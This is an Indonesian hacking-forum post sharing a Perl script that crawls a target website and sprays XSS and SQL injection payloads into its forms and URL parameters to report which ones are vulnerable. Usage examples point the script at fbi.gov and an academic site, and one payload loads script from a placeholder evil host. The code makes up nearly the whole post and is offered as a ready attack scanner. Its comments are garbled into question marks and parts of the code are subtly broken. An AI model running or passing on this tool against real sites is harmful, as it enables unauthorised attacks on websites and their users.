07-21-2012, 11:12 PM
Assalamualaikum All ketemu lg sama orang ganteng xsan-lahci
wkwkwk ane mo share nih cara lain mencari bugs xss dan sqli sampai di kasih tau letak vulnernya pd site target okeh langsung paste aja nih c0dinganya di bawah ini
save aja terserah ente namanya apa tapi formatnya .pl karena di buat dr pemrograman perl
bisa juga paste dr pastebin ane
oke cara pakenya tinggal gini om
kalo si target vuln maka bakal di kasih nih vulnya dimana kaya di SS berikut
okeh semoga membantu happy ganteng wkwkwk
wkwkwk ane mo share nih cara lain mencari bugs xss dan sqli sampai di kasih tau letak vulnernya pd site target okeh langsung paste aja nih c0dinganya di bawah ini
Code:
#!/usr/bin/perl
####################################
#CUp.[su]
#By skvoznoy and profit.
#greetz to ven000m,?erabyte,Benny_29a,Zadoxlik,payhash
#Zaco,YooogI,gema,?erm,xspider, KEZ, SkyOut
####################################
####################################
#?????????? ??? Get ????????
####################################
@buglist = ("%00","%2527%252esasdf","?",
"??","/","../","./..././","/%2e/", "%2e","%5C","%s", "'","'''''","\"",
"%%%%%%","!!!!!!!!!!!!!!!!!!","#", "%5C27","%%5C%56" , "\'", "\\",';',";a", "|",
"\?>", "%a0");
@IMPROPERCOMMONFILTERING = ("<b>warning</b>:", "warning:", "<b>fatal error</b>", "failed
to open stream:", "internal server error", "there was an error when processing
this directive.", "http/1.1 400", "http/1.1 403", "http/1.1 500", "gateway
error", "command not found", "file not found");
####################################
#XSS ??????????
####################################
@XSSbugs = ("<script>alert('XSS')</script>","'';!--\"<XSS>=&{()}","<IMG SRC=\"javascript:alert('XSS');\">","<IMG SRC=javascript:alert("XSS")>","<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>","<IMG SRC=javascript:alert('XSS')>","<IMG SRC=javascript:alert('XSS')>","<SCRIPT/XSS SRC=\"http://remoteevilhost/xss.js\"></SCRIPT>","<IMG SRC=\"javascript:alert('XSS')\"","<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">","<IMG SRC='vbscript:msgbox(\"XSS\")'>","<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">","<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">","<body onload=\"javascript:alert('XSS')\"></body>","<table background=\"javascript:alert('XSS')\"></table>","%22%2Balert(%27XSS%27)%2B%22",">\"'><script>alert('XSS')</script>");
@IMPROPERXSSFILTERING = ("<script> *alert\\('XSS'\\) *<\/script>","<XSS>","<IMG SRC=\"javascript:alert\\('XSS'\\);\">","<IMG SRC=javascript:alert\\("XSS"\\)>","<IMG SRC=javascript:alert\\(String.fromCharCode\\(88,83,83\\)\\)>","<IMG SRC=javascript:alert('XSS')>","<IMG SRC=javascript:alert('XSS')>","<SCRIPT/XSS SRC=\"http://remoteevilhost/xss.js\"><\/SCRIPT>","<IMG SRC=\"javascript:alert\\('XSS'\\)\"","<LINK REL=\"stylesheet\" HREF=\"javascript:alert\\('XSS'\\);\">","<IMG SRC='vbscript:msgbox\\(\"XSS\"\\)'>","<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert\\('XSS'\\);\">","<DIV STYLE=\"background-image: url\\(javascript:alert\\('XSS'\\)\\)\">","<body onload=\"javascript:alert\\('XSS'\\)\"></body>","table background=\"javascript:alert\\('XSS'\\)\"></table>",">\"'><script>alert\\('XSS'\\)</script>");
####################################
#SQL ????????
####################################
@SQLbugs = ("' or 1=1--","\" or 1=1--","or 1=1--","' or 'a'='a","\" or \"a\"=\"a","" or \"a\"=\"a","' OR 1=1","\" OR 1=1"," OR 1=1","or 0=0 #"," or 0=0 #","or 0=0 #");
@IMPROPERSQLFILTERING = ("\\[obdc", "mysql error", "you have an error in your sqlsyntax", "odbc drivers error", "\\[microsoft sql");
####################################
####################################
#XSS
####################################
@begintag = ("<IMG SRC=\"","<LINK REL=\"stylesheet\" HREF=\"","<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=","<DIV STYLE=\"background-image: url(","<body onload=\"","<table background=\"");
@endtag = ("\">","\">","\">",")\">","\"></body>","\"></table>");
@payload = ("javascript:alert('XSS')","javascript:alert("XSS")","javascript:alert(String.fromCharCode(88,83,83))","javascript:javascript:alert('XSS')","javascript:javascript:alert('XSS')");
@tagregex = ("<IMG SRC","<LINK REL=\"stylesheet\" HREF=\"","<META HTTP-EQUIV=","<DIV STYLE=\"background-image: url","<body onload=","<table background=");
@payloadregex= ("javascript:alert\\('XSS'\\)","javascript:alert\\("XSS"\\)","javascript:alert\\(String.fromCharCode\\(88,83,83\\)\\)","javascript:javascript:alert('XSS')","javascript:javascript:alert('XSS')");
####################################
use HTTP::Request::Common;
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
sub URLcode {
my $theURL=$_[0];
$theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg;
return $theURL;
}
sub f_Analyze
{
$targeturl = $_[0];
$content = $ua->request(GET $targeturl);
$content = $content->content();
@cont = split(/\n/,$content); #split as independant lines
$formfound = 0;
print "[@]????? ??????????? $targeturl\n";
foreach $LINE (@cont)
{
if ($LINE =~/<form/i)
{
$formfound = 1;
$LINE =~/action *= *"(.+?)"/i;
$formaction = $1;
$LINE =~/method *= *"(.+?)"/i;
$formmethod = $1;
}
if (($LINE =~/<input/i) && ($formfound))
{
$LINE =~/ type *= *"(.+?)"/i;
push(@formtypes,$1);
$LINE =~/ name *= *"(.+?)"/i;
push(@forminputs,$1);
$LINE =~/ value *= *"(.+?)"/i;
push(@formvalues,$1);
}
if (($LINE =~/<\/form/i) && ($formfound))
{
print "[+]????????????:\n";
print "????????: $formaction ($formmethod)\n";
print "??????????:\n";
for ($yu = 0; $yu < @forminputs; $yu++)
{
print "[=]Name: $forminputs[$yu];Type: $formtypes[$yu];Value: $formvalues[$yu];\n";
}
$formfound = 0;
for ($f = 0; $f < @XSSbugs; $f++)
{
for ($i = 0; $i < @forminputs; $i++)
{
print "[.]XSS ???????? $forminputs[$i] ($f / $#XSSbugs)";
print "[$XSS bugs scan[$f]]" if ($verbose);
print "\n";
push(@formdata,$forminputs[$i] => $XSSbugs[$f]);
if ($i > 0)
{
for ($koe = 0; $koe < $i; $koe++)
{
push(@formdata,$forminputs[$koe] => $formvalues[$koe]);
}
}
if ($i < @forminputs)
{
for ($koe = ($i+1); $koe < @forminputs; $koe++)
{
push(@formdata,$forminputs[$koe] => $formvalues[$koe]);
}
}
if ($formmethod == /POST/i)
{
$response = $ua->request(POST $targeturl,\@formdata);
}
else
{
$response = $ua->request(GET $targeturl,\@formdata);
}
$response = $response->content();
@formdata = ();
for ($z = 0; $z < @IMPROPERXSSFILTERING; $z++)
{
if ($response =~ m/$IMPROPERXSSFILTERING[$z]/i)
{
print "[!]XSS ??????????: $XSSbugs[$f]\n";
}
}
}
}
for ($o = 0; $o < @payload; $o++)
{
for ($c = 0; $c < 2; $c++)
{
for ($a = 0; $a < @begintag; $a++)
{
$injection = $begintag[$a].$payload[$o].$endtag[$a];
if ($c == 1)
{
$injection = ">\"'>".$injection;
}
if ($c == 2)
{
$injection = ">%22%27>".$injection;
}
for ($i = 0; $i < $inputcount; $i++)
{
push(@formdata,$forminputs[$i] => $injection);
print "[.]XSS-fuzz testing $forminputs[$i] ($o ($a / $#begintag) / $#payload)";
print "[$injection]" if ($verbose);
print "\n";
if ($i > 0)
{
for ($w = 0; $w < $i; $w++)
{
push(@formdata,$forminputs[$w] => $formvalues[$w]);
}
}
if ($i < $inputcount)
{
for ($z = ($i+1); $z < $inputcount; $z++)
{
push(@formdata,$forminputs[$z] => $formvalues[$z]);
}
}
if ($formmethod == /POST/i)
{
$response = $ua->request(POST $targeturl,\@formdata);
}
else
{
$response = $ua->request(GET $targeturl,\@formdata);
}
$response = $response->content();
@formdata = ();
if (($response =~ /$tagregex[$a]/) && ($response =~ /$payloadregex[$o]/))
{
print "[!]?????????? XSS $injection\n";
}
}
}
}
}
for ($f = 0; $f < @SQLbugs; $f++)
{
for ($i = 0; $i < $inputcount; $i++)
{
print "[.]SQL bugs scan $forminputs[$i] ($f / $#SQLTRICKS)";
print "[$SQL[$f]]" if ($verbose);
print "\n";
push(@formdata,$forminputs[$i] => $SQLTRICKS[$f]);
if ($i > 0)
{
for ($h = 0; $h < $i; $h++)
{
push(@formdata,$forminputs[$h] => $formvalues[$h]);
}
}
if ($i < $inputcount)
{
for ($h = ($i+1); $h < $inputcount; $h++)
{
push(@formdata,$forminputs[$h] => $formvalues[$h]);
}
}
if ($formmethod == /POST/i)
{
$response = $ua->request(POST $targeturl,\@formdata);
}
else
{
$response = $ua->request(GET $targeturl,\@formdata);
}
$response = $response->content();
@formdata = ();
for ($z = 0; $z < @IMPROPERSQLFILTERING; $z++)
{
if ($response =~ m/$IMPROPERSQLFILTERING[$z]/i)
{
print "[!]?????????? SQL: $SQLTRICKS[$f] \n";
}
}
}
}
$formmethod = '';
$formaction = '';
@forminputs = ();
@formtypes = ();
@formdata = ();
}
}
}
sub Analyzeurl
{
$targeturl = $_[0];
if ($targeturl =~ /(.+)\?(.+)/)
{
$baseurl = $1;
$resturl = $2;
print "[@]???????????? GET ???????? $targeturl\n";
while (index($resturl,"&") > -1)
{
$curind = index($resturl,"&")+1;
push(@getvariables,substr($resturl,0,$curind-1));
$resturl = substr($resturl,$curind,length($resturl));
}
push(@getvariables,$resturl);
for ($i = 0; $i < @getvariables; $i++)
{
($variablename,$defaultvalue) = split(/=/,$getvariables[$i]);
push(@getvarnames,$variablename);
push(@getvarvals,$defaultvalue);
}
}
else
{
return;
}
for ($o = 0; $o < @payload; $o++)
{
for ($c = 0; $c < 2; $c++)
{
for ($a = 0; $a < @begintag; $a++)
{
$injection = $begintag[$a].$payload[$o].$endtag[$a];
if ($c == 1)
{
$injection = ">\"'>".$injection;
}
if ($c == 2)
{
$injection = ">%22%27>".$injection;
}
for ($i = 0; $i < @getvarnames; $i++)
{
for ($l = 0; $l < 1; $l++)
{
if ($l)
{
$evilvalue = URLcode($injection);
}
else
{
$evilvalue = $injection;
}
$constructedurl = $baseurl."?".$getvarnames[$i]."=".$evilvalue;
print "[.]XSS scan $getvarnames[$i] ($o ($a / $#begintag) / $#payload)\n";
if ($i > 0)
{
for ($f = 0; $f < $i; $f++)
{
$constructedurl .= "&".$getvarnames[$f]."=".$getvarvals[$f];
}
}
if ($i < @getvarnames)
{
for ($f = ($i+1); $f < @getvarnames; $f++)
{
$constructedurl .= "&".$getvarnames[$f]."=".$getvarvals[$f];
}
}
$response = $ua->request(GET $constructedurl);
$response = $response->content();
if (($response =~ /$tagregex[$a]/) && ($response =~ /$payloadregex[$o]/))
{
print "[!]?????????? $evilvalue ? $getvarnames[$i]\n";
}
}
}
}
}
}
for ($i = 0; $i < @getvarnames; $i++)
{
for ($y = 0; $y < 2; $y++)
{
if ($y == 0)
{
@CURRENTVLNS = @XSSbugs;
@IF = @IMPROPERXSSFILTERING;
}
elsif ($y == 1)
{
@CURRENTVLNS = @SQLbugs;
@IF = @IMPROPERSQLFILTERING;
}
elsif ($y == 2)
{
@CURRENTVLNS = @buglist;
@IF = @IMPROPERCOMMONFILTERING;
}
for ($l = 0; $l < 1; $l++)
{
for ($x = 0; $x < @CURRENTVLNS; $x++)
{
if ($l)
{
$evilvalue = URLcode($CURRENTVLNS[$x]);
}
else
{
$evilvalue = $CURRENTVLNS[$x];
}
$constructedurl = $baseurl."?".$getvarnames[$i]."=".$evilvalue;
print "[.]Testing $getvarnames[$i] ($x / $#CURRENTVLNS)\n";
if ($i > 0)
{
for ($f = 0; $f < $i; $f++)
{
$constructedurl .= "&".$getvarnames[$f]."=".$getvarvals[$f];
}
}
if ($i < @getvarnames)
{
for ($f = ($i+1); $f < @getvarnames; $f++)
{
$constructedurl .= "&".$getvarnames[$f]."=".$getvarvals[$f];
}
}
$response = $ua->request(GET $constructedurl);
$response = $response->content();
if ($y == 0)
{
if ($response =~ m/$IF[$x]/i)
{
print "[!]?????????? XSS $evilvalue ? $getvarnames[$i] (Urlencoding: $l)\n";
}
}
else
{
for ($z = 0; $z < @IF; $z++)
{
if ($response =~ m/$IF[$z]/i)
{
print "[!]??????????: $evilvalue ? $getvarnames[$i]; (Urlencoding: $l)\n";
}
}
}
}
}
}
}
}
sub Spider
{
$baseurl = $_[0];
$dir = $_[1];
$page = $_[2];
$targeturl = $baseurl.$dir.$page;
$response = $ua->request(GET $targeturl);
$response = $response->content();
@cont = split(/\n/,$response); #split as independant lines
print "[@]Spidering $targeturl\n";
push (@spideredlinks,$targeturl);
Analyzeurl($targeturl);
f_Analyze($targeturl);
foreach $LINE (@cont)
{
if ($LINE =~ /<a +href *= *"(.+?)"/i) #<A HREF> LINKS
{
$linkie = $1;
if (($linkie ne "#") && ($linkie !~ /https*:\/\//))
{
print "[&]$linkie (from $targeturl)\n";
if ($linkie =~ /\//)
{
$dir = substr($linkie,0,rindex($linkie,"/")+1);
$page = substr($linkie,rindex($linkie,"/")+1,length($linkie));
$dir = "/".$dir if ($dir[0] ne "/");
Spider($baseurl,$dir,$page);
}
elsif ($linkie ne $page)
{
$already = 0; #don't spider links we already visited
for ($y = 0; $y < @spideredlinks; $y++)
{
$already = 1 if ($baseurl.$dir.$linkie eq $spideredlinks[$y]);
}
Spider($baseurl,$dir,$linkie) if (!$already);
}
}
}
}
return;
}
sub Usage
{
print "Jane-Jane\n";
print "Version: 0.0.1\n";
print "by skvoznoy and profit\n";
print "How to start: jane.pl <server> <directory> <page> <anything for verbose> (optional)\n";
print "Eg: perl jane.pl http://www.fbi.gov / index.php -v\n";
exit;
}
$verbose = 0;
Usage if (@ARGV < 3);
$verbose = 1 if (@ARGV == 4);
print "????? ??????????? '$ARGV[0]$ARGV[1]$ARGV[2]'...\n ??? ?????? ??????? ??????? ;)\n";
Spider($ARGV[0],$ARGV[1],$ARGV[2]);
save aja terserah ente namanya apa tapi formatnya .pl karena di buat dr pemrograman perl
bisa juga paste dr pastebin ane
oke cara pakenya tinggal gini om
Quote:xsan-lahci@ibt:~# perl Xss_SQL_Scan.pl
Jane-Jane
Version: 0.0.1
by skvoznoy and profit
How to start: Xss_SQL_Scan.pl <server> <directory> <page> <anything for verbose> (optional)
Eg: perl Xss_SQL_Scan.pl http://www.fbi.gov / index.php -v
xsan-lahci@ibt:~# perl Xss_SQL_Scan.pl http://target.ac.id / index.php -v
kalo si target vuln maka bakal di kasih nih vulnya dimana kaya di SS berikut
okeh semoga membantu happy ganteng wkwkwk
visit > https://xsanlahci.wordpress.com
All My Thread > http://indonesianbacktrack.or.id/forum/s...bd179f046e
All My Thread > http://indonesianbacktrack.or.id/forum/s...bd179f046e